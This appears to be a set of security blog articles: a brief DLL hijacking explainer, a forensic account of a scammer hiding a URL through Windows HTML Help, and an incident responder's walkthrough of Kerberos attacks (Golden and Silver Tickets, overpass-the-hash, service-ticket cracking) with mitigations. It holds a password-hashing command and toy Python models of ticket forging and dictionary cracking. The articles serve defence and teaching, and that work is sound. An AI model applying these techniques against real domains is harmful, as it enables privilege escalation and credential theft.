Initially identified fifteen years ago, and clearly articulated in a Microsoft Security Advisory, DLL hijacking is the practice of tricking a vulnerable application into loading a malicious library rather than the legitimate one, allowing the execution of arbitrary code.  The attacker does this by placing the malicious DLL at a preferential location in the Dynamic-Link Library Search Order, the pre-defined sequence Windows follows when searching for a DLL whose path has not been specified by the developer.

Despite published advice on secure development practices to mitigate this threat being available for several years, DLL hijacking remains a problem today.  It is an ideal place for malicious code to hide and persist, and it lets the malicious code take advantage of the security context of the loading program.
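The search order itself can be sketched in a few lines. This is a simplified model, assuming SafeDllSearchMode is enabled; a real Windows resolver also honors KnownDLLs, side-by-side manifests, and SetDllDirectory, which this sketch ignores:

```python
import os

def dll_candidates(app_dir, dll_name, windir=r'C:\Windows', cwd='.'):
    """Candidate paths in the (simplified) SafeDllSearchMode order."""
    order = [
        app_dir,                           # 1. application directory
        os.path.join(windir, 'System32'),  # 2. system directory
        os.path.join(windir, 'System'),    # 3. 16-bit system directory
        windir,                            # 4. Windows directory
        cwd,                               # 5. current working directory
    ]
    order += os.environ.get('PATH', '').split(os.pathsep)  # 6. PATH
    return [os.path.join(d, dll_name) for d in order if d]

def first_hit(app_dir, dll_name, **kw):
    """Return the path that would win the search, or None."""
    for path in dll_candidates(app_dir, dll_name, **kw):
        if os.path.exists(path):
            return path
    return None
```

The hijack works because any writable directory earlier in this list than the legitimate DLL's location lets an attacker's copy win the search.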

How Miscreants Hide From Browser Forensics

Scammers, intruders and other miscreants often aim to conceal their actions from forensic investigators. When analyzing an IT support scam, I interacted with the person posing as the help desk technician. He brought up a web page on my lab system to present a payment form, so I’d supply my contact and credit card details. He did this in a surprising manner, designed to conceal the destination URL.

You can see the scammer bringing up the web page by watching this 17-second video of his actions. Rather than bringing up the web browser, the person launched the HTML Help application, which is built into Windows, by typing:

hh h

According to Microsoft, HTML Help is “the standard help system for the Windows platform. Authors can use HTML Help to create online help for a software application or to create content for a multimedia title or Web site.” To bring up the interface captured in the above video, it’s sufficient to launch the application using the “hh” command and supply any string as a parameter.

Why would the miscreant launch this application? The goal is to use the “Jump to URL…” feature, which is available by clicking in the top left corner of the application:

HTML Help: Jump to URL


The “tech support” rep then pasted the desired URL from the clipboard into the window that popped up. Since the input field of the window was relatively small, I (posing as the victim) could not see the full URL.

The web page rendered within the HTML Help window, the way it would show up within a browser, though there was no URL bar to display the address of the page:

ClickBank Payment Form

Examining the system after this incident, I could not find a reference to the ClickBank URL in the Internet Explorer history. I used ESEDatabaseView to examine the system’s WebCache file; the tool found a cookie set by ClickBank, but showed no relevant URLs. I also used Redline to pull out browser artifacts from this system using memory forensics; this tool showed some URLs belonging to the clickbank.net domain, but not the address of the initial web page:

Redline Clickbank URLs

I was able to locate the URL by extracting all strings from the system’s memory image that included “clickbank” in them. The same URL was also left by the adversary on the system’s clipboard.
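That string-carving step is simple to reproduce. Here is a minimal Python sketch that scans a memory image for printable ASCII runs containing a keyword; note that it reads the whole file into memory, so for large images you would stream it in chunks (the file name is illustrative):

```python
import re

def strings_with(path, keyword, min_len=4):
    """Extract printable ASCII strings of at least min_len bytes from a
    binary image, keeping those that contain the keyword (case-insensitive)."""
    pattern = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    kw = keyword.lower().encode()
    with open(path, 'rb') as f:
        data = f.read()
    return [m.group().decode('ascii')
            for m in pattern.finditer(data)
            if kw in m.group().lower()]
```

This is essentially `strings image.bin | grep -i clickbank` in portable form, which is handy when working a Windows analysis box without GNU tools.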

Based on this analysis, it appears the adversary used an unusual method of visiting the website from the victim’s system to conceal the URL from the person’s view and to make it hard for an investigator to locate the URL in the browser history. This is the first time I’ve seen such an approach, and wanted to share it with the community. If you’ve encountered similar techniques or would like to share your perspective on this situation, please leave a comment.

To learn more about this incident, take a look at my Conversation With a Tech Support Scammer article.

—  Lenny Zeltser

Lenny Zeltser teaches malware analysis at SANS Institute and focuses on safeguarding customers’ IT operations at NCR Corp. He is active on Twitter and writes a security blog.

Kerberos in the Crosshairs: Golden Tickets, Silver Tickets, MITM, and More

It’s been a rough year for Microsoft’s Kerberos implementation.  The culmination was last week when Microsoft announced critical vulnerability MS14-068.  In short, this vulnerability allows any authenticated user to elevate their privileges to domain admin rights.  The issues discussed in this article are not directly related to this bug.  Instead we’ll focus on design and implementation weaknesses that can be exploited under certain conditions.  MS14-068 is an outright bug which should be patched immediately.  If you haven’t patched it yet, I suggest you skip this article for now and work that issue right away.  Then come back later for some more Kerberos fun!

Our red-team friends have been quite busy recently dissecting Kerberos and have uncovered some pretty concerning issues along the way.  Issues, or attacks, such as the “Golden Ticket”, the “Silver Ticket”, man-in-the-middle (MITM) password cracking, and user passwords being reset without user knowledge have all been discovered, disclosed, or advanced over the past few months.  These techniques can allow for credential theft, privilege escalation, and impersonation—goals in just about any advanced attack.  As incident responders, these are issues we should definitely understand in order to “Know thy enemy”.  So let’s get to it.  We’ll start with a discussion of the Kerberos architecture and see how the placement of a compromised host impacts the security of the design.

Kerberos Architecture

In my previous article on network authentication, I presented the following diagram to show how Kerberos addresses the man-in-the-middle design weakness we face with NTLM:

This architecture addresses the man-in-the-middle issue for our privileged accounts that are connecting to compromised hosts.  It allows the user authentication to take place between the trusted client and the DC.  The DC then provides a non-forwardable, target-specific “ticket” to use for connecting to the remote compromised host.  That works great for our IR account scenario, as well as many other scenarios where privileged accounts are reaching out to untrusted hosts.

However, several Kerberos weaknesses come to light when the situation gets flipped around.  If we make the compromised host the client, rather than the target, then we see several issues arise. Here’s that same diagram with the scenario flipped, along with a fuller description of the Kerberos steps and a summary of the issues/attacks raised recently:



Seeing all these issues in one diagram looks pretty ominous.  Fortunately these issues are not deal-breakers for Kerberos, but they should get your attention and hopefully are getting Microsoft’s attention as well.

I’m going to describe each of these issues while stepping through the Kerberos authentication process.   I’ll then provide a few thoughts on mitigations.  First though, let’s start with a high level description of Kerberos.

Kerberos Overview

Microsoft’s implementation of Kerberos allows users (UPN: user principal names) to authenticate to services (SPN: service principal names)—such as CIFS, Terminal Services, LDAP, WS-Management, and even the local host itself (the local host is treated as a service when you perform an interactive logon with a domain account).

Authentication is first done between the user and a trusted 3rd-party called the Key Distribution Center (KDC), which is the domain controller in Microsoft domains.  This initial authentication is done via the user’s long-term key, which is derived from the user’s password in most environments.

When users are ready to authenticate to services, they request a new service ticket from the KDC.  That service ticket is unique to the target service and it includes identity information about the user, such as group membership, inside a structure called the Privilege Attribute Certificate (PAC).  The new service ticket and a new set of temporary encryption keys, called session keys, are passed to the client and then to the service.  The client and the service use the session keys to authenticate each other, as well as encrypt data between them as necessary.  Once the target service receives the service ticket, it will read the included identity information about the user and make a decision as to whether the user is authorized to use the service as requested.
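The trust relationships in that flow can be modeled in a few lines of Python. This is a toy sketch, not real Kerberos: HMAC signing stands in for ticket encryption, the PAC is just JSON, and all names are invented. What it does capture is the key point that the service trusts the PAC contents solely because only it and the KDC know the service's long-term key:

```python
import hmac, hashlib, json

# Shared secret between the KDC and the target service account.
# In real Kerberos this is the service's long-term key; HMAC-SHA256
# here stands in for ticket encryption/integrity.
SERVICE_KEY = b'long-term key of the target service account'

def kdc_issue_ticket(user, groups):
    """KDC side: build a PAC and bind it with the service's key."""
    pac = json.dumps({'user': user, 'groups': sorted(groups)}).encode()
    mac = hmac.new(SERVICE_KEY, pac, hashlib.sha256).digest()
    return pac, mac

def service_authorize(ticket, required_group):
    """Service side: verify the ticket came from the KDC, then make the
    authorization decision from the PAC's group list."""
    pac, mac = ticket
    expected = hmac.new(SERVICE_KEY, pac, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return False                         # not produced with our key
    info = json.loads(pac)
    return required_group in info['groups']  # PAC taken at face value
```

Note that the KDC authenticates; the service authorizes. That separation, and the blind trust in a correctly-keyed PAC, is exactly what the Golden and Silver Ticket attacks later in this article abuse.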

That’s Kerberos in a nutshell.  Of course there are plenty of additional details, some of which we’ll get into shortly.  However, my goal is to strike a balance between providing enough information to fully describe the problems, yet not overwhelm you with unnecessary details.  For example, short-lived session keys are very important to the inner workings of Kerberos, but since they are not directly pertinent to the problems being discussed, I’m going to mostly avoid mentioning them here.  If you find yourself needing more details though, two general resources I recommend are Microsoft’s article “How the Kerberos Version 5 Authentication Protocol Works” and Mark Minasi’s recorded TechEd presentation, “Cracking Open Kerberos: Understanding How Active Directory Knows Who You Are”.

Microsoft Kerberos Step-by-Step

Now that we’ve covered the basics, let’s dig deeper and look at each step of a typical Microsoft Kerberos transaction.  Along the way, we’ll also discuss the weaknesses that provide avenues for attack.


Step 1–Authentication Service Request (AS-REQ):  The user initially authenticates to the KDC’s authentication service (AS) for a special service ticket called a ticket-granting ticket (TGT).  This most commonly occurs when the user initiates an interactive logon, though it can happen in other situations too.  This initial request encrypts the current UTC timestamp of the format YYYYMMDDHHMMSSZ with a long-term key.  In password-based environments, the long-term key is derived from the user’s password.
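That timestamp format is trivial to reproduce; the sketch below is purely illustrative (real pre-authentication then encrypts this value with the long-term key, which is not shown):

```python
from datetime import datetime, timezone

def kerberos_timestamp(now=None):
    """Render a UTC timestamp in the YYYYMMDDHHMMSSZ form that the
    AS-REQ pre-authentication data encrypts."""
    now = now or datetime.now(timezone.utc)
    return now.strftime('%Y%m%d%H%M%SZ')
```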

Multiple encryption types are normally available.  The client should choose the strongest mutually-supported encryption type, but of course an attacker can mount a downgrade attack to force weaker encryption.  Here’s a brief summary of possible encryption types:

  • DES-CBC-CRC (disabled by default in Vista/2008)
  • DES-CBC-MD5 (disabled by default in Vista/2008)
  • RC4-HMAC (XP & 2003 default, as well as the strongest encryption they support)
  • AES128-CTS-HMAC-SHA1-96 (introduced with Vista/2008)
  • AES256-CTS-HMAC-SHA1-96 (default in Vista/2008 and higher)

When a user logs in, Windows will create a long-term key for each encryption method supported by the client OS.  Let’s take a look at the long-term keys for user ‘mike’ on a Windows 7 host that supports both the newer AES and older RC4 algorithms:



In last week’s article, we calculated user mike’s NT hash, which is simply the MD4 hash of the user’s Unicode password.  Here it is again—and notice that the hash value is the same as the RC4 long-term key:

$ echo -n Use4Passphrase,K? | iconv -t UTF-16LE | openssl md4
(stdin)= e456d67ce26e0f174ba2c92f4b677cac

As you can see, Microsoft uses the NT (NTLM) hash for Kerberos RC4 encryption.  Crazy, huh?  Why is this the case?  Apparently it was to support a more seamless upgrade from NT4 (NTLM/LM only) to Windows 2000 (the first version to support Kerberos).


The fact that an NT hash can be used to create Kerberos tickets leads to the ability to do something Benjamin Delpy, the creator of mimikatz, has termed “overpass-the-hash”.  The idea is that you can do more in Kerberos with the NT hash than you can with a standard pass-the-hash attack that utilizes NTLM.  The ability to use the NT hash to create Kerberos tickets opens up a few additional possibilities that can only be done via Kerberos, such as changing a user’s password and joining a machine to a domain.  In fact, the ability to change a password without the user’s knowledge using the NT hash caused a stir this summer following this disclosure by Aorato.  Once an attacker has changed the password, they have at least a small window of opportunity to use services like Remote Desktop and Outlook Web Access that require the password.


Step 2–Authentication Service Response (AS-REP):  Assuming the client encrypted the timestamp correctly in Step 1, and the time is within the accepted skew (5 minutes by default), then the user will have passed authentication.  The KDC then constructs a special service ticket, called the ticket-granting ticket (TGT), to be used when requesting other service tickets from the KDC’s Ticket-Granting Service (TGS).  Like all service tickets, the TGT includes identity information about the user, including username and group memberships.

Also like all service tickets, the TGT is encrypted with the target service’s long-term key.  By encrypting service tickets with the destination service’s long-term key, this protects the information in the ticket from being read or modified since only the KDC and target service know the long-term key.  In the case of the special TGT service ticket, the target service account is the built-in ‘krbtgt’ account.

An interesting feature of Kerberos is that authentication is effectively stateless.  In subsequent communications with the user, the KDC only knows that it previously authenticated this user because the TGT that the client will send in Step 3 has been encrypted with its ‘krbtgt’ account’s long-term key.  Once the KDC receives that encrypted TGT again, it trusts that the user must have previously authenticated and that all the included user and group information in the encrypted ticket is accurate.  This is by design so that any DC in the domain can process subsequent requests without the need to synchronize authentications across all DCs.  To a certain extent, it also does not have to spend additional cycles to look up the account information again as long as the ticket is valid (10 hours by default).  There is a caveat to this though.  Since it would be dangerous to assume for 10 hours that a user has not been deleted, disabled, or modified, the KDC will re-verify the account information if the TGT is more than 20 minutes old.

Let’s take a look at the user’s identity information embedded inside an encrypted ticket.  The following screenshot is from a Powershell Remoting (WS-MAN) session that was captured and parsed with Wireshark:


What’s being parsed here is the Privilege Attribute Certificate (PAC) information.  This has all the necessary information that allows the target service to determine if the user has the proper privileges to perform the requested action.  In this example, user ‘mike’ is just a member of Domain Users, well-known group RID 513.

It’s worth noting again that the information in the ticket, including this PAC data, was created by the KDC and encrypted with the target service’s long-term key—a key that only the KDC and the target service account know.  In order to parse these details in Wireshark, it’s necessary to provide Wireshark with the target account’s long-term Kerberos key, as shown here:


In case anyone wants to try this, what worked for me was using the Linux version of Wireshark (I could not get the PAC to parse in the Windows version) and creating the necessary keytab file with the Linux tool ktutil.  More details on parsing Kerberos encrypted data can be found on Wireshark’s Kerberos page and this SAMBA presentation by Ronnie Sahlberg.  (Thanks to Tim Medin for some guidance here!)


Step 3–Ticket-Granting Service Request (TGS-REQ):  Now the client would like access to a service and it needs a new service ticket to do so. The client double-checks that its TGT is still valid (not expired) and if so, it sends a request to the ticket-granting service on the KDC.  The request includes the user’s TGT and the specific service principal name that it would like to access.  Assuming the TGT is properly encrypted with the ‘krbtgt’ account’s long-term key, and the TGT is less than 20 minutes old as previously mentioned, then the KDC’s ticket-granting service will assume this is an authentic request for an authentic user whose identity details are specified in the PAC inside the ticket.  It will then continue to Step 4 to create the service ticket.

Golden Tickets

Now consider this:  What if an attacker has the long-term key for the ‘krbtgt’ account?  Well, in that case the attacker can create a TGT, put anything they want in it, and pass it to the KDC.  If it’s less than 20 minutes old, then the TGT is treated as fact—the KDC believes it describes an authenticated user with the attributes described in the PAC details.  This describes the “Golden Ticket” attack.  It’s a ticket created by an attacker with the ‘krbtgt’ key that can give any user any rights (via group membership).  In fact, it doesn’t even have to be a real user.  It can be a fictitious username with domain admin membership, or any other membership the attacker chooses to give it.  As long as the ‘krbtgt’ key is valid and the crafted TGT is less than 20 minutes old (and if it’s not, the attacker can simply create a new one), then the KDC will issue service tickets for that user with the specified group membership.  Here’s an example of creating a Golden Ticket for non-existent user ‘bevo’ with domain admin membership via well-known group RID 512:


Assuming I supplied a valid key for the ‘krbtgt’ account, I can get a service ticket to connect to any service in the domain as a domain admin.  Furthermore, the fictitious user named ‘bevo’ is the name that would show up in the remote event logs!

The thing that makes this attack particularly devastating is that the password, and resulting keys, for the ‘krbtgt’ account almost never change.  In fact, research has shown that there is “only one circumstance where this password automatically changes.  The password for the KRBTGT account only changes when the domain functional level is upgraded from a NT5 version (2000/2003) to a NT6 version (2008/2012).  If you move from 2008 -> 2012R2 domain functional level, this hash won’t change.”

This opens up a can of worms for organizations that have previously had their domain compromised and credentials dumped from a domain controller.  It also applies to organizations whose Active Directory data has left their control via an old backup, a DC VM archive, or even an attack they are unaware of.

The takeaway is that if you are responding to a potential domain compromise and see unusual activity, perhaps even from non-existent users, then the Golden Ticket could possibly be in play.  Furthermore, if you’re in a situation where you need to reset the ‘krbtgt’ account for recovery, be sure to change it twice, as described here and here.   Probably the better course of action is to leave the old domain for dead and move to a new pristine domain/forest, but unfortunately that’s not always feasible.
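One practical hunting step follows directly from that takeaway: compare the account names appearing in logon events against the accounts that actually exist in the domain, since a Golden Ticket can carry a fictitious username. A minimal sketch (the event field name follows the 4624 schema; the input formats are otherwise illustrative):

```python
def unknown_accounts(logon_events, ad_users):
    """Flag logon events whose account name does not exist in AD, which
    is one possible indicator of a forged (Golden) ticket in play."""
    known = {u.lower() for u in ad_users}
    return sorted({ev['TargetUserName'] for ev in logon_events
                   if ev['TargetUserName'].lower() not in known})
```

In practice you would feed this the TargetUserName values from collected 4624 events and a user list exported with Get-ADUser, then manually vet the hits (machine accounts and recently deleted users will produce benign matches).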


Step 4–Ticket-Granting Service Response (TGS-REP):  Once the TGS examines and verifies the TGT, it creates the requested service ticket. The client’s identity from the TGT is copied into a PAC in the new service ticket.  Then the new service ticket is sent to the client, who will then pass it on to the target service.

The new service ticket is encrypted with the target service account’s long-term key and the embedded PAC is signed by the ‘krbtgt’ account for verification in optional Step 6.  In most cases, the target service account is the computer account for the remote service.  This is true for common services such as CIFS, RPC, Scheduler, WS-MAN, and many more.  However, the target service account could be a dedicated domain user account used to run the service.

It’s interesting to note that the KDC cannot determine if the user will be able to get access to the target service.  It simply returns a valid ticket.  Authentication does not imply authorization.  Authorization is determined by the target service based on the user and group information in the PAC.


There is no obstacle to requesting service tickets other than having a valid TGT.  A user can request service tickets to any service in the domain.  Again, the KDC doesn’t know if the user is authorized for the service—that’s up to the service to decide—so it happily issues tickets for any valid request it receives.  For a large domain, there could be thousands, perhaps even millions of services, as each host typically has a few SPNs.  Check for yourself with the command “setspn -l <account-name>”.  The <account-name> should be either a computer name or a dedicated user account for hosting services.
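When you collect SPN strings at scale (for instance from setspn output), a small sketch can group them by host so you can see which computers expose which services. The SPN format here is the standard service/host[:port] shape; the parsing is otherwise an illustrative assumption:

```python
from collections import defaultdict

def spn_inventory(spns):
    """Group SPN strings of the form service/host[:port] by host."""
    by_host = defaultdict(set)
    for spn in spns:
        service, _, rest = spn.partition('/')
        host = rest.split(':')[0].lower()   # strip any :port suffix
        by_host[host].add(service.upper())
    return dict(by_host)
```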

Why would this be of interest?  Since the service ticket is encrypted with the service account’s long-term key, an attacker can gather service tickets and attempt a brute-force attack on the long-term key that was used to encrypt the ticket.  If the key can be derived, then there’s potential to elevate privileges via the “Silver Ticket” attack (more on Silver Tickets in Step 5).  The attacker could also take the cracked key and connect to other hosts on the network if the service account has sufficient rights.

By the way, when discussing Kerberos cracking via MITM, I use the terms password and key almost interchangeably.  This is because the most efficient way to crack the key that created the Kerberos ticket is to start with a dictionary attack against the password that created the Kerberos encryption key.  So yes, the MITM attack is cracking the key, but it typically involves first guessing the password that created that key.

For most services, brute-force cracking the password and resulting key is very difficult because the service runs under the built-in computer account.  The password for computer accounts is very complex and highly unlikely to be cracked, regardless of RC4 or AES encryption.  However for some services, the service does not use the built-in computer account to run the service, but instead uses a dedicated domain user account.  Tim Medin has done a lot of research in this area and has found that MS-SQL services are particularly vulnerable to attack because they are typically configured with a domain account rather than a computer account.  Furthermore, many blogs suggest that the quick way to get the job done is to give the MS-SQL service account domain admin rights.  Yikes!

Whether given domain admin rights or not, what is the chance that this dedicated MS-SQL account, or any other domain service account, was given a strong password?  Probably a good chance in some environments and a poor chance in others.  If the password is poor, then the password and resulting Kerberos key can be cracked, period.  It can be cracked faster if the encryption type is RC4 rather than AES, since the Kerberos AES function requires much more computational effort to generate a guess than RC4.  Therefore, along with the “overpass-the-hash” issue described in Step 1, MITM vulnerabilities provide another incentive to decommission RC4 encryption in favor of AES.
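The cost gap between the two is easy to demonstrate. Per RFC 3962, the Kerberos AES string-to-key function is PBKDF2-HMAC-SHA1 with a default of 4,096 iterations, while the RC4 key is a single MD4 of the UTF-16LE password (the NT hash). The sketch below is illustrative only: because MD4 is disabled in many modern OpenSSL builds, it substitutes one SHA-1 call to represent "one cheap hash per guess":

```python
import hashlib, time

def aes_guess(password, salt=b'EXAMPLE.COMuser', iterations=4096):
    # RFC 3962 string-to-key: PBKDF2-HMAC-SHA1, default 4096 iterations.
    # (Real Kerberos salts with REALM + principal name; this salt is made up.)
    return hashlib.pbkdf2_hmac('sha1', password.encode(), salt, iterations, 32)

def rc4_guess(password):
    # The real RC4-HMAC key is MD4(UTF-16LE(password)); SHA-1 stands in
    # here as a single cheap hash, since MD4 is often unavailable.
    return hashlib.sha1(password.encode('utf-16-le')).digest()

def time_guesses(fn, n=100):
    """Wall-clock time to test n candidate passwords with guess function fn."""
    start = time.perf_counter()
    for i in range(n):
        fn('Password%d' % i)
    return time.perf_counter() - start
```

On typical hardware the AES guess loop runs thousands of times slower per candidate than the single-hash loop, which is exactly why a captured RC4-encrypted ticket is the attacker's preferred cracking target.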

Definitely check out the work by Tim Medin on this issue.  He did a great presentation at DerbyCon where he goes through this in great detail.  He also debuts his toolset called Kerberoast, which among other things, provides a tool to crack the Kerberos TGS-REP responses.  He also shows how the discovered password/long-term key can be used to create a Silver Ticket, which I’ll describe in the next step.


Step 5–Application Server Request (AP-REQ):  Once the user receives the service ticket, it’s ready to forward on to the target service. The service will decrypt the ticket with the service account’s long-term key.  After it decrypts the ticket, it will check the user’s information within the PAC.  Based on the account information, the service decides whether or not to authorize the user to perform the requested action.

At this point, the service could proceed to optional Step 6 to validate the PAC information with the KDC.  Only the KDC can validate the PAC because the validation occurs via a signature with the ‘krbtgt’ account.  Ideally this validation would happen to verify that user information is accurate, but it rarely does due to the performance impact.  The validation exceptions are discussed in a number of places, such as the Technet article “Understanding Microsoft Kerberos PAC Validation” and the previously mentioned 20-minute rule article.  In a nutshell, as Tim put it in his DerbyCon presentation, “Basically, if it runs as a service, it will not verify”.  My own testing backs this up.  I’ve yet to find a way to get services that “Act as part of the operating system” (of which most do) to validate, even when the ValidateKdcPacSignature value is set to 1 in the registry as described in the above Technet article.

Silver Tickets

So is it a problem if the service doesn’t verify the PAC information?  Yes, it is a problem if the service account’s long-term key can be discovered (for example, via the MITM attack discussed with Step 4).  If an attacker discovers the long-term key, a service ticket can be crafted that the service will decrypt and trust as long as it doesn’t verify the PAC with the KDC.  What if an attacker creates a service ticket that says the connecting client is a member of the domain admins group?  If the ticket is encrypted with the service’s long-term key, and the service doesn’t verify the PAC data, then it assumes it to be true and will grant access to the connecting user as though they were a domain admin.  This is the “Silver Ticket”.
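A toy model makes the forgery concrete. As before, this is not real Kerberos: HMAC with the service's long-term key stands in for ticket encryption, the PAC is plain JSON, and the key value is invented. The point is that a cracked key lets an attacker mint a PAC the service cannot distinguish from a KDC-issued one, unless it performs the (rarely enabled) KDC validation:

```python
import hmac, hashlib, json

# Assumed to have been recovered offline by cracking a captured ticket.
cracked_service_key = b'weak service account password, cracked'

def forge_silver_ticket(user, groups, key):
    """Attacker side: craft a PAC claiming arbitrary group membership
    and bind it with the cracked service key."""
    pac = json.dumps({'user': user, 'groups': groups}).encode()
    return pac, hmac.new(key, pac, hashlib.sha256).digest()

def service_accepts(ticket, key, validate_with_kdc=False):
    """Service side: the MAC checks out, so without KDC PAC validation
    the forged group membership is taken at face value."""
    pac, mac = ticket
    if not hmac.compare_digest(mac, hmac.new(key, pac, hashlib.sha256).digest()):
        return False
    if validate_with_kdc:
        return False    # modeling the KDC's signature check catching the forgery
    return True
```

Note the forged ticket never touches the KDC at all, so domain controller logs will show nothing; detection has to happen on the service host.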

Why doesn’t Microsoft always verify?  For performance reasons.  From the Technet article referenced above, “Performing PAC validation implies a cost in terms of response time and bandwidth usage. It requires bandwidth usage to transmit requests and responses between an application server and the DC. This may cause some performance issues in high volume application servers (KB906736). In such environments, user authentication may induce additional network delay and traffic for carrying PAC validation messages between the server and the DC.”


Step 6—Verify Service Ticket PAC (Optional) (VERIFY-PAC):  As just discussed, the service has the option to send the PAC information to the KDC to verify the ‘krbtgt’ account’s signature.  This ensures the KDC created the service ticket.  This can be enforced, but it rarely is for performance reasons.


Step 7–Application Server Response (Optional) (AP-REP):  Optionally, the user might have requested in Step 5 that the target service verify its identity for mutual authentication. If so, the service encrypts a timestamp with the session key that only the user and service should know and sends it back to the user for verification.


I’m going to mention just a few things here, and also refer you to a great resource with many more suggestions for hardening your Windows environment.  The paper “Mitigating Service Account Credential Theft on Windows” by HD Moore, Joe Bialek, and Ashwath Murthy provides a very good discussion of the problems we face with privileged accounts, along with a significant list of recommendations beginning on page 8 of the 13-page paper.

Of the Kerberos issues discussed here, the Golden Ticket issue is the most concerning.  Of course it’s concerning if you know your domain controller was compromised and AD credentials were dumped; unless the ‘krbtgt’ account password has since been reset twice, consider that domain to still be compromised.  It’s also concerning if you don’t know whether your domain controller was compromised.  What if there are indications of compromise, but no solid proof?  What if there aren’t even any indications?  Does that mean it hasn’t happened and that it’s okay to keep this almighty ‘krbtgt’ password unchanged for years and years?  That goes against one of our primary security principles: the idea that we should refresh passwords regularly in order to limit exposure from stolen credentials.  I hope Microsoft addresses this by forcing a password rotation scheme for the ‘krbtgt’ account.  In theory it should not be a problem.  The reason you have to change this account’s password twice to invalidate the current password is that there is built-in fault tolerance allowing the previous password to still work.  So it should be possible to rotate in new passwords/keys frequently.  At least that way a compromise (known or unknown) does not effectively last for years.
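The “reset twice” logic follows directly from that fault tolerance, and a few lines of Python make it concrete.  This is just a sketch of the key-history behavior described above, with made-up key names:

```python
# Toy sketch of the krbtgt fault tolerance: the KDC honors the current
# and the previous key, so a single reset leaves a stolen key usable.
class KrbtgtKeyStore:
    def __init__(self, key):
        self.current, self.previous = key, None

    def rotate(self, new_key):
        self.current, self.previous = new_key, self.current

    def accepts(self, key):
        return key in (self.current, self.previous)

kdc = KrbtgtKeyStore("key-2012")   # the long-unchanged, compromised key

kdc.rotate("key-A")
print(kdc.accepts("key-2012"))     # True: one reset is not enough

kdc.rotate("key-B")
print(kdc.accepts("key-2012"))     # False: the second reset invalidates it
```

A scheduled rotation scheme would simply call `rotate` on a regular cadence, bounding the lifetime of any stolen krbtgt key.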

Regarding the Silver Ticket issue, always enforcing PAC validation doesn’t currently appear to be a feasible solution.  Therefore, the best bet here is to do something you’d want to do anyway: enforce very strong passwords for your service accounts to mitigate the MITM attack.  Probably the best way to do that is to use Microsoft’s Managed Service Account feature, which among other things rotates strong passwords every 30 days for designated service accounts.
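Why do strong passwords matter so much here?  Because a captured service ticket is encrypted with a key derived from the service account’s password, an attacker can guess passwords entirely offline.  The sketch below illustrates the idea only: SHA-256 stands in for the real RC4-HMAC/AES key derivation, and the password and wordlist are invented:

```python
import hashlib

# Illustrative stand-in: real Kerberos derives the service key from the
# account password (NT hash for RC4-HMAC, PBKDF2-style for AES).
def derive_key(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()

# The key material an attacker can test against, recovered from a
# captured service ticket -- no further contact with the DC is needed.
captured_key = derive_key("Summer2014")

wordlist = ["password", "Welcome1", "Summer2014", "P@ssw0rd"]
cracked = next((p for p in wordlist if derive_key(p) == captured_key), None)
print(cracked)  # a dictionary password falls almost instantly
```

A 30-day-rotated, machine-generated password (as with Managed Service Accounts) is effectively immune to this kind of guessing, which is the whole point of the recommendation.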

Lastly, to help address both the MITM and “overpass-the-hash” issues, disable the older RC4 encryption type if possible.  This makes brute-force MITM attacks more time-consuming and prevents the NT hash from being used to create Kerberos tickets.  From a Windows perspective, this can be done via Group Policy after all XP and 2003 systems have been decommissioned.
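The reason disabling RC4 helps is that the RC4-HMAC Kerberos key *is* the unsalted NT hash, while the AES key types are derived from the password plus a per-principal salt.  The sketch below illustrates that distinction only; SHA-256 and PBKDF2 stand in for the real derivations, and all values are invented:

```python
import hashlib

# Stand-in for RC4-HMAC: the Kerberos key equals the unsalted password hash,
# so a dumped hash can be used directly ("overpass-the-hash").
def rc4_style_key(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()

# Stand-in for AES: the key mixes in a salt (realm + principal name),
# so it can only be derived from the PASSWORD, not from the NT hash.
def aes_style_key(password: str, salt: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               salt.encode(), 1000).hex()

dumped_hash = rc4_style_key("S3cret!")   # what a credential dump yields

# With RC4 enabled, the dumped hash alone is a valid ticket key:
print(dumped_hash == rc4_style_key("S3cret!"))             # True
# With only AES allowed, the hash is not the key material:
print(aes_style_key("S3cret!", "REALM.svc") == dumped_hash)  # False
```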


Mike Pilkington is a Sr. Information Security Consultant and Incident Responder for a Fortune 500 company in Houston, TX, as well as a SANS instructor teaching FOR408 and FOR508.  Find Mike on Twitter @mikepilkington.